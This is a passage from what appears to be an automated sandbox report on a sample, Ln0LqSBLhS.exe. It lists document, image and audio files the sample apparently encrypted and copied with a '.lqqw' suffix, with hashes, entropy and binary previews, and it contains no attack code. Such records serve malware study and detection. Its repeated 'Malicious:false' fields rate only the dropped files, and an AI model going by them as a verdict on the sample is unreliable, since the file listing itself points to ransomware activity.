                                                                                                                                                                                                    Entropy (8bit):7.856877813883489
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:24:Wr28712lrrLNfcUcRhLbLc1D78xzUxTl45KWYdHO8EkRln+EiNPPXbD:xi14rrdcU4I1D4GxTl45KWWckRYD
                                                                                                                                                                                                    MD5:66AD50016EA104A93A5B2E7EA465C218
                                                                                                                                                                                                    SHA1:D7AA64852D36B634D2C27A93618538DAA06F4028
                                                                                                                                                                                                    SHA-256:DAE7E4906BA3C60B2D1485328C579BBE8C21C72A0AE707A409C54574EC1F855B
                                                                                                                                                                                                    SHA-512:DB045299C88051CBB71348847F6B2FA85923490A2B149CE8E77F47A2485B1F68F49BC15CD6ED04403427F2869505160DA74AC9D677543D66EA546B047255936E
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: ...*,ox.d..._'...W..G.)...j...[cC........y.a.i..3..5.......u..Y5^....U..s.m5.sj.C.7`w.........8./...q...L..sz3.-..z.#...~....%:v..tm....P....K..n....g..6.dw...1t....a.P.H....c.6`..cy..J..Rpr`c|....W>iUt<..E.|F.w.......yH#nSz....2...NM...B.........@Z3.....#L$3';P.o<j.Z.l.M...L.u,60.8...hKGz,...[......K.*(...@j.....?..f......v..g.=/.....(_..E.)..A.4.Y../.b`.p.h.."l.7~.e+7Y....[...@....{....L.S"R^z...^..`..f.u.......X.\...........;pi...Jk..>...V...zO.....7Z.x*.......VEQ.......uH.Iy.>.....}...k..I.._R....e.|......\.B..*..g.6../Ftk.(..A....< ...t.A.p....g......n....n,. .x@..JU..RH...........z..V,..g(.....Y".&*....,.<......4..^.h.d..m...QL..j...3yW...-.(.".^.E.4...WZ*|0?....Nq.;...`...31.D.SW..f....T.....{.....1..R.....M.3.e.R.JH).?.9'f.*.R.*..-.........g{...7.fW.4hY....&2...VN......6F..wn.n.KY.YXb[P...^..*{a -9.."#......AL....c....6XN/zhm..8....&%&.e.........C.&..>...*t.+...Df>p.'H.."RT..T.B...w...U..EJ].})?;..,....Z...*!..#.aW...X.^...X.$.c$.'.
                                                                                                                                                                                                    C:\Users\user\Documents\PALRGUCVEH\EIVQSAOTAQ.pdf.lqqw (copy)
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):1355
                                                                                                                                                                                                    Entropy (8bit):7.856877813883489
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:24:Wr28712lrrLNfcUcRhLbLc1D78xzUxTl45KWYdHO8EkRln+EiNPPXbD:xi14rrdcU4I1D4GxTl45KWWckRYD
                                                                                                                                                                                                    MD5:66AD50016EA104A93A5B2E7EA465C218
                                                                                                                                                                                                    SHA1:D7AA64852D36B634D2C27A93618538DAA06F4028
                                                                                                                                                                                                    SHA-256:DAE7E4906BA3C60B2D1485328C579BBE8C21C72A0AE707A409C54574EC1F855B
                                                                                                                                                                                                    SHA-512:DB045299C88051CBB71348847F6B2FA85923490A2B149CE8E77F47A2485B1F68F49BC15CD6ED04403427F2869505160DA74AC9D677543D66EA546B047255936E
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: ...*,ox.d..._'...W..G.)...j...[cC........y.a.i..3..5.......u..Y5^....U..s.m5.sj.C.7`w.........8./...q...L..sz3.-..z.#...~....%:v..tm....P....K..n....g..6.dw...1t....a.P.H....c.6`..cy..J..Rpr`c|....W>iUt<..E.|F.w.......yH#nSz....2...NM...B.........@Z3.....#L$3';P.o<j.Z.l.M...L.u,60.8...hKGz,...[......K.*(...@j.....?..f......v..g.=/.....(_..E.)..A.4.Y../.b`.p.h.."l.7~.e+7Y....[...@....{....L.S"R^z...^..`..f.u.......X.\...........;pi...Jk..>...V...zO.....7Z.x*.......VEQ.......uH.Iy.>.....}...k..I.._R....e.|......\.B..*..g.6../Ftk.(..A....< ...t.A.p....g......n....n,. .x@..JU..RH...........z..V,..g(.....Y".&*....,.<......4..^.h.d..m...QL..j...3yW...-.(.".^.E.4...WZ*|0?....Nq.;...`...31.D.SW..f....T.....{.....1..R.....M.3.e.R.JH).?.9'f.*.R.*..-.........g{...7.fW.4hY....&2...VN......6F..wn.n.KY.YXb[P...^..*{a -9.."#......AL....c....6XN/zhm..8....&%&.e.........C.&..>...*t.+...Df>p.'H.."RT..T.B...w...U..EJ].})?;..,....Z...*!..#.aW...X.^...X.$.c$.'.
                                                                                                                                                                                                    C:\Users\user\Documents\PALRGUCVEH\EOWRVPQCCS.xlsx
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):1355
                                                                                                                                                                                                    Entropy (8bit):7.845530402475654
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:24:3xLkXm5ahom/I1pYi6SRoEYrzbtb/53pF+HVsYMOXG2YEzCcr1mzeNvfkbD:3dGVhepuzbtbeVsYMiG2YEFr46hfuD
                                                                                                                                                                                                    MD5:16650B1FEA96626E1E13E5942BD36340
                                                                                                                                                                                                    SHA1:9CE2B955EE9941224734CEAE7BF0A62FCC0C35E0
                                                                                                                                                                                                    SHA-256:B0FF4776F95EB1D706CC57317C8907DB86503AC0C6CF67D05964BAB8C6BA4C43
                                                                                                                                                                                                    SHA-512:878109124C39418C3C4D68C2DB9783819E26122613822A5B994F6A1E1B199FD1E7677654943570301542975268FE03EDC93ABAC31592820EEC500A84449DFA60
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: E..).u...rY.:nd..?.n...4`G...p...G.S.L.k[g.m.v.S~.......s%ib6_.S.....cL...HJZ\.d........../.....T.....'.....h......{..xu.....:>%.k......Mh..oV....@p..{..k.|....)..S............/>e.*{....Y....i.1.J#8.6..A@nm.[......_`.E;.y...APa..V...O....].....B.<...<:..0.._...-d.4Nx..-Tb.Uy$...."9.l.z.m..y...#..s..#.........%.]...........Rttm!.jD....<.X...bF>..r.IR0..O.>.......2..[c.1.?..4.^.d.sS@..bl.R....G..!/*..l^..O.X$..[...f....?v.'.>.m...s4..r/.K...L..K..&......<!^...)..E...E.G8..0OF ....\...niS.t.C.......lK.7...:<i...q+.M."Pj\.~6..>...'......*..F...{...q@.=a.}.}..A...h(.j;!..G.x.......9S...WS+x....;*....R..[.}..........|.c.A.}U....O.}..mL.G...1Z.......x.....1.W.g}......2.........o.g........4.%`r[.C.S......nh......3..=8.2..)..#.t{*.kV..FAJ;...*.R.....H...^....N..k..z..#!Z.....I...-~dZ....g.k..;YV..r..w...u.Zm.d.C}P...,...9.w....g#....B..9pg.H....Q.S..B.k.C....*......M.........77L...-....y.8.[..r1..0v...A......T....t..yyL.H..iyO..$*..*.eJ.~
                                                                                                                                                                                                    C:\Users\user\Documents\PALRGUCVEH\EOWRVPQCCS.xlsx.lqqw (copy)
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):1355
                                                                                                                                                                                                    Entropy (8bit):7.845530402475654
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:24:3xLkXm5ahom/I1pYi6SRoEYrzbtb/53pF+HVsYMOXG2YEzCcr1mzeNvfkbD:3dGVhepuzbtbeVsYMiG2YEFr46hfuD
                                                                                                                                                                                                    MD5:16650B1FEA96626E1E13E5942BD36340
                                                                                                                                                                                                    SHA1:9CE2B955EE9941224734CEAE7BF0A62FCC0C35E0
                                                                                                                                                                                                    SHA-256:B0FF4776F95EB1D706CC57317C8907DB86503AC0C6CF67D05964BAB8C6BA4C43
                                                                                                                                                                                                    SHA-512:878109124C39418C3C4D68C2DB9783819E26122613822A5B994F6A1E1B199FD1E7677654943570301542975268FE03EDC93ABAC31592820EEC500A84449DFA60
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: E..).u...rY.:nd..?.n...4`G...p...G.S.L.k[g.m.v.S~.......s%ib6_.S.....cL...HJZ\.d........../.....T.....'.....h......{..xu.....:>%.k......Mh..oV....@p..{..k.|....)..S............/>e.*{....Y....i.1.J#8.6..A@nm.[......_`.E;.y...APa..V...O....].....B.<...<:..0.._...-d.4Nx..-Tb.Uy$...."9.l.z.m..y...#..s..#.........%.]...........Rttm!.jD....<.X...bF>..r.IR0..O.>.......2..[c.1.?..4.^.d.sS@..bl.R....G..!/*..l^..O.X$..[...f....?v.'.>.m...s4..r/.K...L..K..&......<!^...)..E...E.G8..0OF ....\...niS.t.C.......lK.7...:<i...q+.M."Pj\.~6..>...'......*..F...{...q@.=a.}.}..A...h(.j;!..G.x.......9S...WS+x....;*....R..[.}..........|.c.A.}U....O.}..mL.G...1Z.......x.....1.W.g}......2.........o.g........4.%`r[.C.S......nh......3..=8.2..)..#.t{*.kV..FAJ;...*.R.....H...^....N..k..z..#!Z.....I...-~dZ....g.k..;YV..r..w...u.Zm.d.C}P...,...9.w....g#....B..9pg.H....Q.S..B.k.C....*......M.........77L...-....y.8.[..r1..0v...A......T....t..yyL.H..iyO..$*..*.eJ.~
                                                                                                                                                                                                    C:\Users\user\Documents\PALRGUCVEH\GIGIYTFFYT.jpg
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):1355
                                                                                                                                                                                                    Entropy (8bit):7.825516150503562
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:24:tRCzSt9ZCHmbmNYVHjX7bSzJE+twYA928Y074ojtGaSlaYmFoLmWb1V5h76d5bD:tRCet9PqNeHrfiJ3tLq4oUbsYmyLmWbm
                                                                                                                                                                                                    MD5:D9E67A4FDF8AC38CFDC9FC700D759F58
                                                                                                                                                                                                    SHA1:2B2197A20E9298ABA37401BE1C16E1F79168207D
                                                                                                                                                                                                    SHA-256:F75F449620FD4774C9ACF3F07CE9EB5A2F10C0025B68BCA4B6B93B1C1747D798
                                                                                                                                                                                                    SHA-512:1397FE93C2F245A209D9A883225389BF946B8FB04238C04351BFE1E6F2CB0DE74C4BD1858D60584A4A900FAB091485B708379036D1462EBA99DFD62135CDC461
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: ]....}.8>Bm..v...t;E.y..5Z...k0.x.w..:9..PU{..;T4..B@......<.W.M.........=.~8E.AQz_.......xe8..f.)|..V..{......J...K.i.A..-V....X...,.++.,.>.-..PA;.[gr{..lv.E.g.H.s.....m..2......A....f.N.Vz.....V...+.<...*.#.+...d.WB<G.*.4...n<.r.l... .g?a...s......0~7'..m..R+..H....oy.l.rb.....h.....^.G....L..T9"r..tQnE..:b..2yud...n...r..q6R.s.H..S=...oCqEw'.NZ...Gdg.r.....U:"4.\..R........."E.!.Eb...3..mF..?.6...',TZ.Z%....E .m......i.'.=k].Jn...{.._.l.~!......|r..=..V.[...1..#.&....6..s.y.........p'.P..J.l.:....F.?....g.#.k.@.|......{.hr.PxWV.A../#........D.y.E.E...._.B..c..%Q)GX.U...].+..}t2.2....l...,...}YI.... ..#.D_o..{.~ ....&*.T..|.]AK......(q?.a!...P.f.N.O#..<.Q...3p.....6..<..tA.s...}.j..D..nc......h...........A.N...7_...Yx.C,.fR|Ox..<.-O.&=..i..4....kD...a..9..0B.H.M.Yt=..G.}.....g^.....#qyc.g.F o.rF.~.}>Sy.2:....x..99h..."..0.~<a...tA...\..5tC.....g5..g.6f..;ad.:..-|$XJ..TZIg&...T......l.?.R,'..g.(..W......[...ns;c}......@.V..+21.....
                                                                                                                                                                                                    C:\Users\user\Documents\PALRGUCVEH\GIGIYTFFYT.jpg.lqqw (copy)
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):1355
                                                                                                                                                                                                    Entropy (8bit):7.825516150503562
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:24:tRCzSt9ZCHmbmNYVHjX7bSzJE+twYA928Y074ojtGaSlaYmFoLmWb1V5h76d5bD:tRCet9PqNeHrfiJ3tLq4oUbsYmyLmWbm
                                                                                                                                                                                                    MD5:D9E67A4FDF8AC38CFDC9FC700D759F58
                                                                                                                                                                                                    SHA1:2B2197A20E9298ABA37401BE1C16E1F79168207D
                                                                                                                                                                                                    SHA-256:F75F449620FD4774C9ACF3F07CE9EB5A2F10C0025B68BCA4B6B93B1C1747D798
                                                                                                                                                                                                    SHA-512:1397FE93C2F245A209D9A883225389BF946B8FB04238C04351BFE1E6F2CB0DE74C4BD1858D60584A4A900FAB091485B708379036D1462EBA99DFD62135CDC461
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: ]....}.8>Bm..v...t;E.y..5Z...k0.x.w..:9..PU{..;T4..B@......<.W.M.........=.~8E.AQz_.......xe8..f.)|..V..{......J...K.i.A..-V....X...,.++.,.>.-..PA;.[gr{..lv.E.g.H.s.....m..2......A....f.N.Vz.....V...+.<...*.#.+...d.WB<G.*.4...n<.r.l... .g?a...s......0~7'..m..R+..H....oy.l.rb.....h.....^.G....L..T9"r..tQnE..:b..2yud...n...r..q6R.s.H..S=...oCqEw'.NZ...Gdg.r.....U:"4.\..R........."E.!.Eb...3..mF..?.6...',TZ.Z%....E .m......i.'.=k].Jn...{.._.l.~!......|r..=..V.[...1..#.&....6..s.y.........p'.P..J.l.:....F.?....g.#.k.@.|......{.hr.PxWV.A../#........D.y.E.E...._.B..c..%Q)GX.U...].+..}t2.2....l...,...}YI.... ..#.D_o..{.~ ....&*.T..|.]AK......(q?.a!...P.f.N.O#..<.Q...3p.....6..<..tA.s...}.j..D..nc......h...........A.N...7_...Yx.C,.fR|Ox..<.-O.&=..i..4....kD...a..9..0B.H.M.Yt=..G.}.....g^.....#qyc.g.F o.rF.~.}>Sy.2:....x..99h..."..0.~<a...tA...\..5tC.....g5..g.6f..;ad.:..-|$XJ..TZIg&...T......l.?.R,'..g.(..W......[...ns;c}......@.V..+21.....
                                                                                                                                                                                                    C:\Users\user\Documents\PALRGUCVEH\PALRGUCVEH.docx
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):1355
                                                                                                                                                                                                    Entropy (8bit):7.843277963042354
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:24:DA9etnvg5lgQyR0QQMMdH+JczNS+PMx0UMnufpZT6ISENxtZFbD:DkERzCzjMx0Xi7uISExrVD
                                                                                                                                                                                                    MD5:24C554C486C5E7A6410DF813A3DD43A0
                                                                                                                                                                                                    SHA1:6DEA403466C3075DDBA0F125D12ED3BCDEA82953
                                                                                                                                                                                                    SHA-256:2810DC3055440A8BE135CF37D3B9062827C3B305CC9CFA2B9F5D8CCBE00D182C
                                                                                                                                                                                                    SHA-512:01D1D8F1600AE0EE72B84CD756DA302B2B25FB5764624B8F60A4D437D3913CFC5EAD8D4D1A0BDC8CDF50F02C75E7AC34147479E333F0E2CF805AA6C5E7313D9A
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: ......d...Z.T..Zvf.D..........r.ER.tl$I.....&...Ftl..[.....,l....;..e...~.v.......<x.......,.I;.X.b.....!.....)...N+.2...m 2..S....U....F.7....0.~. ...S.m^.p.6..T.j...:.lK`..[@..[<E.....(.YZ....O........*.]...$.@L.....d5..{.q.G.{:.@.wg..-....$.>.9.K8LE....M...I.upx.v'......$.8.-X'.d.[P5.].DnH...z....0;<..y0 ..c.. .m.V.V.I6.IT.M.$..OlM..6y....M..Q.3IIo.S'....C.x...!......%...G..."3=..[... 8../L-Z..4.z.d....lz....s.V.Z.X.Et..P.n\h.....R{]}.W G..E<.REr~&Ht....}.....Y=...'.VO:...|k..ZJ7~....^).Y..P..$+.{.Ah.J..i#J.-Uxe.....8.J.|.+..].....AC.......O..t.%.........H!.....2.,0..d...~.h.X...QU.Nt.XN#............3U...Qxg$.2d.wZ.....}..e.}..#.|.r(.BH...B...^...U.. .l.U.Cp...V...X.t.v....}.l.A'.L.=...`.p0VA&...~6.[./27....o...%q...i.9C...w....>......k..D....+. .1...p...{>;M....e^B2.<7d.Y..);.....q.........s,.M.....r{.K.....".G.L~..'S..O_....*Z.4.*........K.+..O.8.$........{8.F{{.Zm].."e..O.i.Q.y.......B.G..E..Td.`......-........8.~..L......,
                                                                                                                                                                                                    C:\Users\user\Documents\PALRGUCVEH\PALRGUCVEH.docx.lqqw (copy)
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):1355
                                                                                                                                                                                                    Entropy (8bit):7.843277963042354
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:24:DA9etnvg5lgQyR0QQMMdH+JczNS+PMx0UMnufpZT6ISENxtZFbD:DkERzCzjMx0Xi7uISExrVD
                                                                                                                                                                                                    MD5:24C554C486C5E7A6410DF813A3DD43A0
                                                                                                                                                                                                    SHA1:6DEA403466C3075DDBA0F125D12ED3BCDEA82953
                                                                                                                                                                                                    SHA-256:2810DC3055440A8BE135CF37D3B9062827C3B305CC9CFA2B9F5D8CCBE00D182C
                                                                                                                                                                                                    SHA-512:01D1D8F1600AE0EE72B84CD756DA302B2B25FB5764624B8F60A4D437D3913CFC5EAD8D4D1A0BDC8CDF50F02C75E7AC34147479E333F0E2CF805AA6C5E7313D9A
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: ......d...Z.T..Zvf.D..........r.ER.tl$I.....&...Ftl..[.....,l....;..e...~.v.......<x.......,.I;.X.b.....!.....)...N+.2...m 2..S....U....F.7....0.~. ...S.m^.p.6..T.j...:.lK`..[@..[<E.....(.YZ....O........*.]...$.@L.....d5..{.q.G.{:.@.wg..-....$.>.9.K8LE....M...I.upx.v'......$.8.-X'.d.[P5.].DnH...z....0;<..y0 ..c.. .m.V.V.I6.IT.M.$..OlM..6y....M..Q.3IIo.S'....C.x...!......%...G..."3=..[... 8../L-Z..4.z.d....lz....s.V.Z.X.Et..P.n\h.....R{]}.W G..E<.REr~&Ht....}.....Y=...'.VO:...|k..ZJ7~....^).Y..P..$+.{.Ah.J..i#J.-Uxe.....8.J.|.+..].....AC.......O..t.%.........H!.....2.,0..d...~.h.X...QU.Nt.XN#............3U...Qxg$.2d.wZ.....}..e.}..#.|.r(.BH...B...^...U.. .l.U.Cp...V...X.t.v....}.l.A'.L.=...`.p0VA&...~6.[./27....o...%q...i.9C...w....>......k..D....+. .1...p...{>;M....e^B2.<7d.Y..);.....q.........s,.M.....r{.K.....".G.L~..'S..O_....*Z.4.*........K.+..O.8.$........{8.F{{.Zm].."e..O.i.Q.y.......B.G..E..Td.`......-........8.~..L......,
                                                                                                                                                                                                    C:\Users\user\Documents\PALRGUCVEH\QCOILOQIKC.mp3
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):1355
                                                                                                                                                                                                    Entropy (8bit):7.81370758243139
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:24:5pD5notAAkGRi/VP5US4nL6/S6D4Ri8y+rhC+Vp720AQzboIbD:5pD5nQAAkGRwKnO/qNy+Nvp6JK8SD
                                                                                                                                                                                                    MD5:2A07B8D0368761CCCC1498BDFBD88F27
                                                                                                                                                                                                    SHA1:543E542B73D6178CA64456C7A08C268C386B65D6
                                                                                                                                                                                                    SHA-256:44109C1597F83254ABC9045B495671BCC54996D806491E1EC7FAC52F634C2B78
                                                                                                                                                                                                    SHA-512:09E5254812B2F1566AE69A999B65875EEC147BFF8DA262E07F0276C46239CF5457BC938C29F67C73F60A2F7DBCF3EF2232039FD50CBBD40D24F77B536572032B
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: a...GB..8 .~...5.....I..'..$...Q....p....,.=...>.+!.z.&.E<.}.0..a.DK.....Pgj2.6 ...yT....E...A...a....(..G.0..D..}.%3..3........5..mMNlBi..2h@nN....-JH..]c.HAbVw.)..".LQ.\.....B....!.\S...6a.-J.k.$o..R....HU4Av.'....t`y.Y.!.8....q+...^.u..p.....(............Q;....C...{k...k.f.Rz./;...W.....C_.bj...tkf..-.<9....BDX\.<..%.Ch......'...0.E.......t:}lD....z|v1....Ss.L).i...8.5..?.....q@h...'.4.....~.A8..D.C'..a.f...|_.a.........,.N.?`..%X...n.c.ju.....s3O....}..;.\.FN...&........._..c[.:.E@.q...._.t,.-...b6......u.W..<.?.._@. ...?....w..m.^.Qf.1f...X4C...u.-<....Oy.!\9-.3.$.!N.M..p...[.N.j/<|]..!...vc^9m.A..j.kQ"..4.m..-.}q^".ZP..\x.V.v.)j..+@.~5>.<8..Gz.v..0.s...L*z.....bG~.F...'G..\A.......\._...M.d..:E.vjO.z...S<..>H".;~_.|..H..s{+.........3....D~.".K\:.3nu.A.KM..).}.=...(..~._DP..z.y._|5W...3.2I...@....C...jfg.f.^.YC.,.....5M...C?_.w.;.$....R.`%.3y-2..<...h2(..n..4.D...6D.u..Z..=.u....^...<.U9...I.....!N'.....G.j.~&[.y.xTW-.(~.&%7.G.T"..
                                                                                                                                                                                                    C:\Users\user\Documents\PALRGUCVEH\QCOILOQIKC.mp3.lqqw (copy)
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):1355
                                                                                                                                                                                                    Entropy (8bit):7.81370758243139
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:24:5pD5notAAkGRi/VP5US4nL6/S6D4Ri8y+rhC+Vp720AQzboIbD:5pD5nQAAkGRwKnO/qNy+Nvp6JK8SD
                                                                                                                                                                                                    MD5:2A07B8D0368761CCCC1498BDFBD88F27
                                                                                                                                                                                                    SHA1:543E542B73D6178CA64456C7A08C268C386B65D6
                                                                                                                                                                                                    SHA-256:44109C1597F83254ABC9045B495671BCC54996D806491E1EC7FAC52F634C2B78
                                                                                                                                                                                                    SHA-512:09E5254812B2F1566AE69A999B65875EEC147BFF8DA262E07F0276C46239CF5457BC938C29F67C73F60A2F7DBCF3EF2232039FD50CBBD40D24F77B536572032B
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: a...GB..8 .~...5.....I..'..$...Q....p....,.=...>.+!.z.&.E<.}.0..a.DK.....Pgj2.6 ...yT....E...A...a....(..G.0..D..}.%3..3........5..mMNlBi..2h@nN....-JH..]c.HAbVw.)..".LQ.\.....B....!.\S...6a.-J.k.$o..R....HU4Av.'....t`y.Y.!.8....q+...^.u..p.....(............Q;....C...{k...k.f.Rz./;...W.....C_.bj...tkf..-.<9....BDX\.<..%.Ch......'...0.E.......t:}lD....z|v1....Ss.L).i...8.5..?.....q@h...'.4.....~.A8..D.C'..a.f...|_.a.........,.N.?`..%X...n.c.ju.....s3O....}..;.\.FN...&........._..c[.:.E@.q...._.t,.-...b6......u.W..<.?.._@. ...?....w..m.^.Qf.1f...X4C...u.-<....Oy.!\9-.3.$.!N.M..p...[.N.j/<|]..!...vc^9m.A..j.kQ"..4.m..-.}q^".ZP..\x.V.v.)j..+@.~5>.<8..Gz.v..0.s...L*z.....bG~.F...'G..\A.......\._...M.d..:E.vjO.z...S<..>H".;~_.|..H..s{+.........3....D~.".K\:.3nu.A.KM..).}.=...(..~._DP..z.y._|5W...3.2I...@....C...jfg.f.^.YC.,.....5M...C?_.w.;.$....R.`%.3y-2..<...h2(..n..4.D...6D.u..Z..=.u....^...<.U9...I.....!N'.....G.j.~&[.y.xTW-.(~.&%7.G.T"..
                                                                                                                                                                                                    C:\Users\user\Documents\PALRGUCVEH\TQDFJHPUIU.png
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):1355
                                                                                                                                                                                                    Entropy (8bit):7.8460763141870355
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:24:Gj9WLsV0xAxXeqURzAtjhiE8W/ylCB3mXkDob4MtUVXwhKmu/Z5pBkIEHa9+H9Ro:c92unU2tdUeNBmkwUV2CvEM+dRMD
                                                                                                                                                                                                    MD5:93748F71A79D3693FB378DBEBEEF93BD
                                                                                                                                                                                                    SHA1:469A6C534730C1F1963ED91C9A3F527907C791EF
                                                                                                                                                                                                    SHA-256:AC326652D9246E9C230BFD8D75F9016145208AE554D260FC3DD9D923C70B6809
                                                                                                                                                                                                    SHA-512:8C3C0E92E99F33235753FDAEA91B29579B335D8C6E5D9ED8F611C3D0E2A4FD696887C36761055A576EA8FEA4DD99B5BEF06624219F62995E44C5687027A613D9
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: E.L....B;..~.-.b..CS..Q...w...m...J[..!=....3.X.E.)....wC<..Z.T.9..fC.&3..?6\3.~.).{E..#...|.5vE.....{.n.......v..K.....<..r..z....Z.......0.5\.K._5.6.$.!..:.....m.../5.....h.....]}.@... v.....z. ...(..6.p"......WK.,.`;.4..W.[.r..P..`.W.G.=1...o.X...R|......O>..8....@<q.?.9..8`.}|......<..=.....T....:..U....YW}.F..T..b..Z%.G{...]k.*.x.O....b.G..?...l.)..J.....4.+......u...U.v.d.}.u.j....9S. ...]...(.9.W<I.s.P4.7T.~S<......cw.@..d....B#...G.6.B..(... g.l./.e...}.f...+x62......W.Z...NfZ_.@.D-:..G./.D.t...r<.k.Xy*....^.Y....'......U...(.. V.+!jCh....b....4..6..Xm.Q._..{3.ML..a... ...H.R.A.t.z........h.R=.J..5.L(....d..N..[d. ..#.u....u.....3.J...IA..>.....g\.5......e.. @.J*....z.Bd....Ve....u..+.Kc....Y.p..]...|`*u.e..;...x...#..e.A&..P].T...Kj..g*=.<.[...r..(..7..k)i..y...........D*.......L.y....i.....a...;....F...T........G.Q.d&.c....=.-._...S..q)P*......f...nt.........O.d}<&..h...xMk~.`<..D..0.cB..E...8....Rl.....x7".3.}..#}lr
                                                                                                                                                                                                    C:\Users\user\Documents\PALRGUCVEH\TQDFJHPUIU.png.lqqw (copy)
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):1355
                                                                                                                                                                                                    Entropy (8bit):7.8460763141870355
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:24:Gj9WLsV0xAxXeqURzAtjhiE8W/ylCB3mXkDob4MtUVXwhKmu/Z5pBkIEHa9+H9Ro:c92unU2tdUeNBmkwUV2CvEM+dRMD
                                                                                                                                                                                                    MD5:93748F71A79D3693FB378DBEBEEF93BD
                                                                                                                                                                                                    SHA1:469A6C534730C1F1963ED91C9A3F527907C791EF
                                                                                                                                                                                                    SHA-256:AC326652D9246E9C230BFD8D75F9016145208AE554D260FC3DD9D923C70B6809
                                                                                                                                                                                                    SHA-512:8C3C0E92E99F33235753FDAEA91B29579B335D8C6E5D9ED8F611C3D0E2A4FD696887C36761055A576EA8FEA4DD99B5BEF06624219F62995E44C5687027A613D9
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: E.L....B;..~.-.b..CS..Q...w...m...J[..!=....3.X.E.)....wC<..Z.T.9..fC.&3..?6\3.~.).{E..#...|.5vE.....{.n.......v..K.....<..r..z....Z.......0.5\.K._5.6.$.!..:.....m.../5.....h.....]}.@... v.....z. ...(..6.p"......WK.,.`;.4..W.[.r..P..`.W.G.=1...o.X...R|......O>..8....@<q.?.9..8`.}|......<..=.....T....:..U....YW}.F..T..b..Z%.G{...]k.*.x.O....b.G..?...l.)..J.....4.+......u...U.v.d.}.u.j....9S. ...]...(.9.W<I.s.P4.7T.~S<......cw.@..d....B#...G.6.B..(... g.l./.e...}.f...+x62......W.Z...NfZ_.@.D-:..G./.D.t...r<.k.Xy*....^.Y....'......U...(.. V.+!jCh....b....4..6..Xm.Q._..{3.ML..a... ...H.R.A.t.z........h.R=.J..5.L(....d..N..[d. ..#.u....u.....3.J...IA..>.....g\.5......e.. @.J*....z.Bd....Ve....u..+.Kc....Y.p..]...|`*u.e..;...x...#..e.A&..P].T...Kj..g*=.<.[...r..(..7..k)i..y...........D*.......L.y....i.....a...;....F...T........G.Q.d&.c....=.-._...S..q)P*......f...nt.........O.d}<&..h...xMk~.`<..D..0.cB..E...8....Rl.....x7".3.}..#}lr
